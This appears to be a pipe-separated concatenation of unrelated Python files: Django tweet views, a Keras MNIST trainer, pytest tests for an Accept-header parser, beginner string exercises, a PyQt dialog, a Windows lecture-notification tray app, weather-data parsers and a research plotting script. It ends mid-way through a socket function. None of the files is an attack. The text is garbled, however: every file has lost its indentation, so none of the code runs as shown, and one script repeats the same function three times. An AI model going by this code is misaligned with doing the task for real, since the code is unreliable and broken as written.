def get_xml_from_attribute(group_name, attribute_name, root_name):
app = adsk.core.Application.get()
design_ = adsk.fusion.Design.cast(app.activeProduct)
attrib = design_.attributes.itemByName(group_name, attribute_name)
# Get XML Root node
if attrib is not None:
root = ElementTree.fromstring(attrib.value)
else:
root = ElementTree.Element(root_name)
return root
# Builds a drop down menu for all states of the given type
def build_drop_down(inputs, title, group_name, attrib_name, root_name, is_check_box=False):
if is_check_box:
drop_down = inputs.addDropDownCommandInput('select_state', title,
adsk.core.DropDownStyles.CheckBoxDropDownStyle)
drop_down_items = drop_down.listItems
else:
drop_down = inputs.addDropDownCommandInput('currentState', title,
adsk.core.DropDownStyles.TextListDropDownStyle)
drop_down_items = drop_down.listItems
drop_down_items.add('Current', True)
update_drop_down(drop_down_items, group_name, attrib_name, root_name)
def update_drop_down(drop_down_items, group_name, attrib_name, root_name):
root = get_xml_from_attribute(group_name, attrib_name, root_name)
if root:
for state in root.findall('state'):
drop_down_items.add(state.get('name'), False, )
# Processes values from a state if a new one is selected
def process_values(inputs, group_name, attrib_name, xml_read_function, root_name):
state = inputs.itemById('currentState').selectedItem.name
if state != 'Current':
root = get_xml_from_attribute(group_name, attrib_name, root_name)
if root:
xml_read_function(root, state)
# Saves values for the given state type into proper attribute XML
def save_values(inputs, group_name, attrib_name, xml_write_function, root_name):
app = adsk.core.Application.get()
design = adsk.fusion.Design.cast(app.activeProduct)
root = get_xml_from_attribute(group_name, attrib_name, root_name)
xml_string = xml_write_function(root, inputs.itemById('newName').value, design)
design.attributes.add(group_name, attrib_name, xml_string)
|
my_big_data = [['a001','홍길동',29,'신암동 12-4'],\
['a001','홍길동',29,'신암동 12-4']]
print(my_big_data)
|
import os
import struct
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers.core import Dense
from keras.optimizers import SGD
from keras.utils import np_utils
def load_mnist(path, which='train'):
if which == 'train':
labels_path = os.path.join(path, 'train-labels-idx1-ubyte')
images_path = os.path.join(path, 'train-images-idx3-ubyte')
elif which == 'test':
labels_path = os.path.join(path, 't10k-labels-idx1-ubyte')
images_path = os.path.join(path, 't10k-images-idx3-ubyte')
else:
raise AttributeError('`which` must be "train" or "test"')
with open(labels_path, 'rb') as lbpath:
magic, n = struct.unpack('>II', lbpath.read(8))
labels = np.fromfile(lbpath, dtype=np.uint8)
with open(images_path, 'rb') as imgpath:
magic, n, rows, cols = struct.unpack('>IIII', imgpath.read(16))
images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)
return images, labels
def plot_digit(X, y, idx):
img = X[idx].reshape(28,28)
plt.imshow(img, cmap='Greys', interpolation='nearest')
plt.title('true label: %d' % y[idx])
plt.show()
X,y = load_mnist('../../datasets/mnist')
X_t,y_t = load_mnist('../../datasets/mnist', which='test')
y_c=np_utils.to_categorical(y)
model = Sequential()
model.add(Dense(input_dim=X.shape[1],output_dim=50,init='uniform',activation='tanh'))
model.add(Dense(input_dim=50, output_dim=50,init='uniform',activation='tanh'))
model.add(Dense(input_dim=50, output_dim=y_c.shape[1],init='uniform',activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001, decay=1e-7, momentum=0.9))
model.fit(X,y_c,nb_epoch=50,batch_size=300,verbose=1,validation_split=0.1,show_accuracy=True)
y_t_p = model.predict_classes(X_t, verbose=0)
print(('Test accuracy: %.2f%%' % (float(np.sum(y_t == y_t_p, axis=0)) / X_t.shape[0] * 100))) |
from django.shortcuts import render
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from tweets.models import Tweet
from users.models import UserAccount
from tweets.serializers import TweetSerializer
from users.serializers import UserSerializered
from datetime import datetime
# Create your views here.
class TweetList(generics.ListCreateAPIView):
queryset = Tweet.objects.all()
serializer_class = TweetSerializer
@api_view(['POST'])
def details(request):
tweet = Tweet.objects.get(id=request.data['id'])
serializer = TweetSerializer(tweet, many=False)
return Response(serializer.data)
@api_view(['POST'])
def bookmakrs(request):
bookmakrs = []
for v in request.data['user_bookmarks']:
tweet = Tweet.objects.get(id=v['tweet_id'])
bookmakrs.append(tweet)
print(bookmakrs)
serializer = TweetSerializer(bookmakrs, many=True)
return Response(serializer.data)
@api_view(['POST'])
def following(request):
following = []
for v in request.data['userTo']:
tweets = Tweet.objects.all().filter(user_id=v['user_to'])
for v in tweets:
following.append(v)
serializer = TweetSerializer(following, many=True)
return Response(serializer.data)
@api_view(['POST'])
def search(request):
tweets = Tweet.objects.filter(content__icontains=request.data['content'])
serializer = TweetSerializer(tweets, many=True)
return Response(serializer.data)
|
import pytest
from restdoctor.utils.media_type import parse_accept
def test_parse_none():
result = parse_accept(None)
assert result is None
@pytest.mark.parametrize(
'header,expected_version',
(
('*/*', 'fallback'),
('text/html', 'fallback'),
('application/json', 'fallback'),
('application/vnd.bestdoctor', 'default'),
),
)
def test_parse_accept_fallback(settings, header, expected_version):
settings.API_FALLBACK_VERSION = 'fallback'
settings.API_DEFAULT_VERSION = 'default'
settings.API_VERSIONS = {
'v1': 'v1',
'v2': 'v2',
}
settings.API_FALLBACK_FOR_APPLICATION_JSON_ONLY = False
result = parse_accept(header)
assert expected_version == result.version
@pytest.mark.parametrize(
'header,expected_version',
(
('*/*', 'default'),
('text/html', 'default'),
('application/json', 'fallback'),
('application/vnd.bestdoctor', 'default'),
),
)
def test_parse_accept_default(settings, header, expected_version):
settings.API_FALLBACK_VERSION = 'fallback'
settings.API_DEFAULT_VERSION = 'default'
settings.API_VERSIONS = {
'v1': 'v1',
'v2': 'v2',
}
settings.API_FALLBACK_FOR_APPLICATION_JSON_ONLY = True
result = parse_accept(header)
assert expected_version == result.version
@pytest.mark.parametrize(
'header,expected_version',
(
('application/vnd.bestdoctor', 'default'),
('application/vnd.bestdoctor.v1', 'v1'),
('application/vnd.bestdoctor.v1.full', 'v1'),
('application/vnd.bestdoctor.v1.full+json', 'v1'),
('application/vnd.bestdoctor.v2', 'v2'),
('application/vnd.bestdoctor.v2.full', 'v2'),
('application/vnd.bestdoctor.v2.full+json', 'v2'),
('application/vnd.bestdoctor.v3', 'default'),
('application/vnd.bestdoctor.v3.full', 'default'),
('application/vnd.bestdoctor.v3.full+json', 'default'),
),
)
def test_parse_accept_versions(settings, header, expected_version):
settings.API_FALLBACK_VERSION = 'fallback'
settings.API_DEFAULT_VERSION = 'default'
settings.API_VERSIONS = {
'v1': 'v1',
'v2': 'v2',
}
result = parse_accept(header)
assert expected_version == result.version
@pytest.mark.parametrize(
'vendor,expected_vendor',
(
(None, 'vendor'),
('', 'vendor'),
('my_vendor', 'my_vendor'),
),
)
def test_parse_accept_vendor_success_case(vendor, expected_vendor):
result = parse_accept('application/vnd', vendor=vendor)
assert expected_vendor == result.vendor
|
name = "Sam"
print("Name is :", name)
lastletters = name[1:]
print("LastLetters of name are : ", lastletters)
print(lastletters * 4)
print("I ", lastletters , "super cool")
print('Sum of 2 and 3 is: ', 2+3)
print(f'Sum of 2 and 3 is : {2+3}')
print('Sum of 2 and 3 is: {}'.format(2+3))
print("2 concatenated with 3 is :", '2' + '3')
print("2 concatenated with 3 is :{}".format('2' + '3'))
print(f"2 concatenated with 3 is: {'2'+ '3'}")
message = "Today is a beautiful day!"
for i in range(5):
message = 'Hello!' + message
print(message)
#String Methods
x = 'Hello World!'
print('Using upper method for ',x , 'gives ', x.upper())
print('Using lower method on ', x , 'gives ', x.lower())
print('Using split method on ', x, 'gives ', x.split())
x = 'This is a nice string'
print('Splitting "',x , ' " by letter i gives ', x.split('i'))
|
from PyQt5.QtWidgets import QWidget, QDialog
from PyQt5.QtGui import QImage, QPalette, QBrush
from PyQt5.QtCore import QSize, Qt
import main_menu
SCREEN_SIZE = [700, 700]
class LostWindow(QDialog, QWidget):
def __init__(self):
super().__init__()
self.setModal(True)
self.initUI()
def initUI(self):
self.setWindowTitle('ПОБЕДА')
self.setFixedSize(*SCREEN_SIZE)
oImage = QImage('lost/lost.png')
sImage = oImage.scaled(QSize(*SCREEN_SIZE))
palette = QPalette()
palette.setBrush(QPalette.Window, QBrush(sImage))
self.setPalette(palette)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Space:
self.close()
self.main_menu = main_menu.MainMenu()
self.main_menu.show()
|
import time
from datetime import datetime
from os.path import join as path_join
from math import log, floor
import click
import matplotlib
matplotlib.rcParams['font.family'] = 'serif'
matplotlib.rcParams['mathtext.fontset'] = 'cm'
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import pandas
import numpy as np
from tabulate import tabulate
import tabulate as T
from scipy.stats import mannwhitneyu
from scipy.stats import ks_2samp
from scipy.stats import shapiro
from scipy.stats import ttest_ind
from scipy.stats import zscore
from statsmodels.sandbox.stats.multicomp import multipletests
from scipy.stats import chi2_contingency
ui_automation_frameworks = [
"androidviewclient",
'appium',
'calabash',
'espresso',
'monkeyrunner',
'pythonuiautomator',
'robotium',
'uiautomator',
]
cloud_test_services = [
'projectquantum',
'qmetry',
'saucelabs',
'firebase',
'perfecto',
'bitbar',
]
unit_test_frameworks = [
'junit',
'androidjunitrunner',
'roboelectric',
'robospock',
]
ci_services = [
'travis',
'circleci',
'app_veyor',
'codeship',
'codefresh',
'wercker',
]
downloads_scale = [
'1 - 5',
'10 - 50',
'50 - 100',
'100 - 500',
'500 - 1,000',
'1,000 - 5,000',
'5,000 - 10,000',
'10,000 - 50,000',
'50,000 - 100,000',
'100,000 - 500,000',
'500,000 - 1,000,000',
'1,000,000 - 5,000,000',
'5,000,000 - 10,000,000',
'10,000,000 - 50,000,000',
'50,000,000 - 100,000,000',
'100,000,000 - 500,000,000',
'500,000,000 - 1,000,000,000',
'1,000,000,000 - 5,000,000,000',
'5,000,000,000 - 10,000,000,000',
]
def human_format(number):
units = ['', 'K', 'M', 'G', 'T', 'P']
k = 1000.0
magnitude = int(floor(log(number, k)))
return '%.0f%s' % (number / k**magnitude, units[magnitude])
@click.command()
@click.option('-i','--results_input', default=".", type=click.Path(exists=True))
@click.option('-o','--results_output', default="./reports", type=click.Path(exists=True))
def reports(results_input, results_output):
"""Generate reports for EMSE paper."""
now = pandas.Timestamp(2017, 9, 30, 12)
df = pandas.read_csv(
path_join(results_input, "results_with_coverage.csv"),
parse_dates=[0, 10]
)
df_googleplay = pandas.read_csv(
path_join(results_input, "googleplay.csv"),
index_col='package'
)
df = df.join(df_googleplay, on="app_id")
df_sonar = pandas.read_csv("results_sonar.csv", index_col='package')
df_sonar.fillna(0, inplace=True)
df_sonar = df_sonar.add_prefix('sonar_')
df = df.join(df_sonar, on="app_id")
#Feature engineering
df['tests'] = df[unit_test_frameworks+ui_automation_frameworks+cloud_test_services].any(axis=1)
df['unit_tests'] = df[unit_test_frameworks].apply(any, axis=1)
df['ui_tests'] = df[ui_automation_frameworks].apply(any, axis=1)
df["cloud_tests"] = df[cloud_test_services].apply(any, axis=1)
df["ci/cd"] = df[ci_services].apply(any, axis=1)
df['age'] = (now - df['created_at'])
df['age_numeric'] = (now - df['created_at']).astype('<m8[Y]').astype('int')
df['time_since_last_update'] = (now - df['last_updated'])
df['time_since_last_update_numeric'] = df['time_since_last_update'].astype('<m8[Y]').astype('int')
df_old = df[df['age_numeric']>=2]
df["downloads"] = df["downloads"].astype("category", categories=downloads_scale, ordered=True)
df['sonar_issues_ratio'] = df['sonar_issues'].divide(df['sonar_files_processed'])
df['sonar_blocker_issues_ratio'] = df['sonar_blocker_issues'].divide(df['sonar_files_processed'])
df['sonar_critical_issues_ratio'] = df['sonar_critical_issues'].divide(df['sonar_files_processed'])
df['sonar_major_issues_ratio'] = df['sonar_major_issues'].divide(df['sonar_files_processed'])
df['sonar_minor_issues_ratio'] = df['sonar_minor_issues'].divide(df['sonar_files_processed'])
df_with_google_data = df[~df["rating_count"].isnull()]
df_with_tests = df[df['tests']]
df_without_tests = df[~df['tests']]
df.to_csv("results_merged.csv")
colors_dict = {
'any': 'C0',
'unit_test_frameworks': 'C1',
'ui_automation_frameworks': 'C2',
'cloud_test_services': 'C3',
'ci_services': 'C4',
}
marker_dict = {
'any': 'o',
'unit_test_frameworks': 'v',
'ui_automation_frameworks': '*',
'cloud_test_services': 'H',
'ci_services': 's',
}
# --- Number of projects by framework --- #
columns = (
['tests']
+ ['unit_tests'] + unit_test_frameworks
+ ['ui_tests'] + ui_automation_frameworks
+ ['cloud_tests'] + cloud_test_services
# + ['ci/cd'] + ci_services
)
colors = (
[colors_dict['any']] +
[colors_dict['unit_test_frameworks']] * (len(unit_test_frameworks) + 1)
+ [colors_dict['ui_automation_frameworks']] * (len(ui_automation_frameworks) + 1)
+ [colors_dict['cloud_test_services']] * (len(cloud_test_services) + 1)
+ [colors_dict['ci_services']] * (len(ci_services) + 1)
)
highlights = [
'tests',
'unit_tests',
'ui_tests',
'cloud_tests',
'ci/cd',
]
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
title=None, verbose=False, **kwargs):
project_with_test_per_age = []
total_projects_per_age = []
n_projects_with_tests_history = []
total_projects_history = []
age_max = df_projects['age_numeric'].max()+1
for age in range(age_max)[::-1]:
n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
n_projects_with_tests_history.append(n_projects_with_tests)
total_projects = len(df_projects[df_projects['age_numeric']==age].index)
total_projects_history.append(total_projects)
project_with_test_per_age.append(n_projects_with_tests)
total_projects_per_age.append(total_projects)
if verbose:
print("Age {}:".format(age))
print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
portions = []
for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
if total > 0:
portions.append(with_tests/len(df_projects))
else:
portions.append(0)
plt.plot(range(age_max)[::-1], portions, **kwargs)
# plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
ax = plt.gca()
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.set_xticks(range(age_max)[::-1])
ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
ax.set_ylabel("Percentage of projects")
ax.yaxis.grid(linestyle='dotted', color='gray')
ax.legend(loc='upper center', shadow=False)
if title:
ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm.pdf"))
ax.invert_xaxis()
figure.savefig(path_join(results_output, "tests_by_age_cumm_i.pdf"))
# ------------------------------------------------------------ #
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
title=None, verbose=False, **kwargs):
project_with_test_per_age = []
total_projects_per_age = []
n_projects_with_tests_history = []
total_projects_history = []
age_max = df_projects['age_numeric'].max()+1
for age in range(age_max):
n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
n_projects_with_tests_history.append(n_projects_with_tests)
total_projects = len(df_projects[df_projects['age_numeric']==age].index)
total_projects_history.append(total_projects)
project_with_test_per_age.append(n_projects_with_tests)
total_projects_per_age.append(total_projects)
if verbose:
print("Age {}:".format(age))
print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
portions = []
for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
if total > 0:
portions.append(with_tests/len(df_projects))
else:
portions.append(0)
plt.plot(range(age_max), portions, **kwargs)
# plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
ax = plt.gca()
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.set_xticks(range(age_max))
ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
ax.set_ylabel("Percentage of projects")
ax.yaxis.grid(linestyle='dotted', color='gray')
ax.legend(loc='upper center', shadow=False)
if title:
ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm_2.pdf"))
# ------------------------------------------------------------ #
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
title=None, verbose=False, **kwargs):
project_with_test_per_age = []
total_projects_per_age = []
n_projects_with_tests_history = []
total_projects_history = []
age_max = df_projects['age_numeric'].max()+1
for age in range(age_max):
n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
n_projects_with_tests_history.append(n_projects_with_tests)
total_projects = len(df_projects[df_projects['age_numeric']==age].index)
total_projects_history.append(total_projects)
project_with_test_per_age.append(n_projects_with_tests)
total_projects_per_age.append(total_projects)
if verbose:
print("Age {}:".format(age))
print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
portions = []
for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
if total > 0:
portions.append(with_tests/total)
else:
portions.append(0)
plt.plot(range(age_max), portions, **kwargs)
# plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
ax = plt.gca()
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.set_xticks(range(age_max))
ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
ax.set_ylabel("Percentage of projects")
ax.yaxis.grid(linestyle='dotted', color='gray')
ax.legend(loc='upper center', shadow=False)
if title:
ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm_3.pdf"))
ax.invert_xaxis()
figure.savefig(path_join(results_output, "tests_by_age_cumm_3_i.pdf"))
# ------------------------------------------------------------ #
def exit_gracefully(start_time):
"""Print time spent"""
exit_time = time.time()
duration = exit_time - start_time
click.secho(
"Reports generated in {:.4f} seconds.".format(duration),
fg='blue'
)
if __name__ == '__main__':
start_time = time.time()
try:
reports()
finally:
exit_gracefully(start_time)
|
import json
class Store:
"""
A class used to represent a Store
Attributes
----------
name : str
the name of the town or city where the store is located
postcode : str
the store's postcode
"""
def __init__(self, name, postcode):
self.name = name
self.postcode = postcode
storesData = []
with open('./static/stores.json', 'r') as f:
storesData = json.load(f)
def get_stores_data():
"""Returns static stores data (list of dicts) until/if I add a database"""
return storesData
|
import argparse
import yaml
import os
from src.get_data import get_data,read_params
def load_and_save(config_path):
config = read_params(config_path)
df = get_data(config_path)
df.columns = [cols.replace(' ','_') for cols in df.columns]
write_path = config['load_data']['raw_data_set']
df.to_csv(write_path,sep=',',index=False,header=True)
if __name__== "__main__":
args = argparse.ArgumentParser()
default_config_path = os.path.join("config",'params.yaml')
load_and_save(default_config_path) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-21 08:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('booktest', '0002_auto_20171121_0755'),
]
operations = [
migrations.AlterField(
model_name='bookinfo',
name='btitle',
field=models.CharField(max_length=20),
),
]
|
#Receba o salário de um funcionário e mostre o novo salário com reajuste de 15%.
salario=float(input('digite o salario: '))
print(f'o novo salario é {salario*1.15}') |
#-*- coding:utf-8 -*-
import os
import json
import requests
import webbrowser
import win32api
import win32con
import win32gui
def get_new_lecture():
try:
user_agent = {'user-agent': 'Mozilla/5.0'}
url = "http://www.cqupt.edu.cn/getPublicPage.do?ffmodel=notic&&nc_mode=news&page=1&rows=20"
response = requests.get(url, headers=user_agent, timeout=10)
response.raise_for_status()
webdata = response.text.encode('utf-8')
decodejson = json.loads(webdata)
lecture_id = decodejson['rows'][0]['id'].encode('utf-8')
title = decodejson['rows'][0]['nc_title'].encode('utf-8')
time = decodejson['rows'][0]['puser_time'].encode('utf-8')
dept_name = decodejson['rows'][0]['dept_name'].encode('utf-8')
with open("../res/new_lecture_id.txt", "rb") as f:
old_lecture_id = f.read()
if int(lecture_id) > int(old_lecture_id):
with open("../res/new_lecture_id.txt", "wb") as f:
f.write(lecture_id)
return title, time, lecture_id, dept_name
except BaseException:
return None
class Taskbar:
def __init__(self, title="Notification", msg="message", lecture_id=0, icon_path=None):
self.title = title
self.msg = msg
self.lecture_id = lecture_id
self.visible = 0
message_map = {
win32con.WM_DESTROY: self.onDestroy,
win32con.WM_USER + 20: self.onTaskbarNotify,
}
# Register the Window class.
wc = win32gui.WNDCLASS()
hinst = wc.hInstance = win32api.GetModuleHandle(None)
wc.lpszClassName = "PythonTaskbarDemo"
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
wc.hbrBackground = win32con.COLOR_WINDOW
wc.lpfnWndProc = message_map # could also specify a wndproc.
classAtom = win32gui.RegisterClass(wc)
# Create the Window.
style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
self.hwnd = win32gui.CreateWindow(
classAtom,
"Taskbar Demo",
style,
0,
0,
win32con.CW_USEDEFAULT,
win32con.CW_USEDEFAULT,
0,
0,
hinst,
None)
win32gui.UpdateWindow(self.hwnd)
# icon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
# self.setIcon(icon)
# self.show()
if icon_path is not None:
icon_path = os.path.realpath(icon_path)
else:
hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
try:
hicon = win32gui.LoadImage(hinst, icon_path,
win32con.IMAGE_ICON, 0, 0, icon_flags)
except:
hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
self.setIcon(hicon)
self.show()
def setIcon(self, hicon, tooltip=None):
self.hicon = hicon
self.tooltip = tooltip
def show(self):
"""Display the taskbar icon"""
flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE
if self.tooltip is not None:
flags |= win32gui.NIF_TIP
nid = (
self.hwnd,
0,
flags,
win32con.WM_USER +
20,
self.hicon,
self.tooltip)
else:
nid = (self.hwnd, 0, flags, win32con.WM_USER + 20, self.hicon)
if self.visible:
self.hide()
win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
self.visible = 1
def hide(self):
"""Hide the taskbar icon"""
if self.visible:
nid = (self.hwnd, 0)
win32gui.Shell_NotifyIcon(win32gui.NIM_DELETE, nid)
self.visible = 0
def onDestroy(self, hwnd, msg, wparam, lparam):
self.hide()
win32gui.PostQuitMessage(0) # Terminate the app.
def onTaskbarNotify(self, hwnd, msg, wparam, lparam):
if lparam == win32con.WM_LBUTTONUP:
self.onClick()
elif lparam == win32con.WM_LBUTTONDBLCLK:
self.onDoubleClick()
elif lparam == win32con.WM_RBUTTONUP:
self.onRightClick()
return 1
def onClick(self):
self.detail(self.lecture_id)
def onDoubleClick(self):
win32gui.PostQuitMessage(0)
def onRightClick(self):
pass
def showToast(self):
flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_INFO
nid = (
self.hwnd,
0,
flags,
win32con.WM_USER +
20,
self.hicon,
"",
self.msg,
10,
self.title
)
win32gui.Shell_NotifyIcon(win32gui.NIM_MODIFY, nid)
def detail(self, lecture_id):
morelink = 'http://www.cqupt.edu.cn/getPublicNotic.do?id=%s' % lecture_id
webbrowser.open(morelink)
if __name__ == "__main__":
result = get_new_lecture()
if result is not None:
title, time, lecture_id, dept_name = result
t = Taskbar(title=time.decode('utf-8'),
msg=title.decode('utf-8'),
lecture_id=lecture_id,
icon_path="../img/python.ico")
t.showToast()
win32gui.PumpMessages()
else:
pass
|
import string
import datetime
import pandas as pd
import numpy as np
import os
import re
def path_generator(year, month, place, amedas_root):
AtoZ = string.ascii_uppercase[0:27]
AtoZ = str(AtoZ)
zeroto_z = str(0) + str(123456789) + AtoZ
fmt = "{year}_{1or2}/AM10{year_2:02d}{month_2:02d}/A{year_1}{month_1}{place:05d}.CSV"
param = {
"year": year,
"year_2": year % 100,
"1or2": "1" if month <= 6 else "2",
"month_2": month,
"year_1": zeroto_z[year - 1990],
"month_1": zeroto_z[month],
"place": place
}
return os.path.join(amedas_root, fmt.format(**param))
def month_converter(year, month, place, amedas_root):
DATAPATH = path_generator(year, month, place, amedas_root)
with open(DATAPATH, "r") as f:
data = f.readlines()
df = pd.DataFrame([],
columns=["datetime", "precipitation", "temparature", "wind_direction", "wind_speed",
"sunshine", ])
for i in range(len(data) // 145):
idx = data[145 * i]
if idx.strip().split(",")[1] == '4':
raw = [datum.strip().split(",")[1:6] for datum in data[145 * i + 1:145 * i + 145]]
temp_df = pd.DataFrame(raw,
columns=["precipitation", "temparature", "wind_direction", "wind_speed", "sunshine"])
param = {"year": year, "month": month, "day": i + 1}
temp_df["datetime"] = pd.date_range("{year}-{month:02d}-{day:02d} 00:00".format(**param),
"{year}-{month:02d}-{day:02d} 23:50".format(**param),
freq="10T") + datetime.timedelta(minutes=10)
df = pd.concat([df, temp_df])
else:
print("Formatting Error, datatype = {}".format(idx.strip().split(",")[1]))
raise
return df
def line_parser(line):
idxpattern = re.compile(
r"^(?P<code>[0-9]{5})(?P<name>[ぁ-んァ-ン一-龥ヶ]+) *(?P<kana>[^\s]+)\s*(?P<abb>[^\s]+)\s*(?P<cor>[0-9]{10,11})\s*(?P<alt>[\-0-9]+)")
m = idxpattern.match(line)
cor = m.group("cor")
latitude = cor[0:5]
longitude = cor[5:11]
return [m.group("code"), m.group("name"), m.group("kana"), m.group("abb"), latitude, longitude, m.group("alt")]
def get_place_code(year, month, cityname, amedasdir):
fmt = "{year}_{1or2}/"
param = {
"year": year,
"1or2": "1" if month <= 6 else "2",
}
dirname = os.path.join(amedasdir, fmt.format(**param), "idx")
path1 = os.path.join(dirname, "idx{year}.{month:02d}".format(year=year, month=month))
path2 = os.path.join(dirname, "sidx{year}.{month:02d}".format(year=year, month=month))
found_flag = 0
for path in [path1, path2]:
with open(path, encoding="cp932") as f:
data = f.readlines()
for datum in data:
idx = datum.find(cityname)
if idx != -1:
found_flag = 1
break
if found_flag == 1:
break
print("not found in {}".format(path))
if found_flag == 0:
print("{year}_{month}_{cityname} not found".format(year=year, month=month, cityname=cityname))
ret = -1
else:
parsed_data = []
for datum in data:
try:
datum = line_parser(datum)
parsed_data.append(datum)
except AttributeError:
print("WARNING:Parse error in the following line")
print(datum)
df = pd.DataFrame(parsed_data, columns=["code", "city", "kana", "abb", "latitude", "longitude", "altitude"])
ret = df.loc[df["city"] == cityname, "code"]
if len(ret) > 0:
ret = ret.iloc[0]
else:
ret = -1
return int(ret)
|
from django.urls import path
from user_account.views import signin_view, signup_view
app_name='user'
urlpatterns=[
path('login/',signin_view, name='login'),
path('signup/',signup_view, name='register'),
] |
import socket
import sys
def CreateConnect(host, port, server=False):
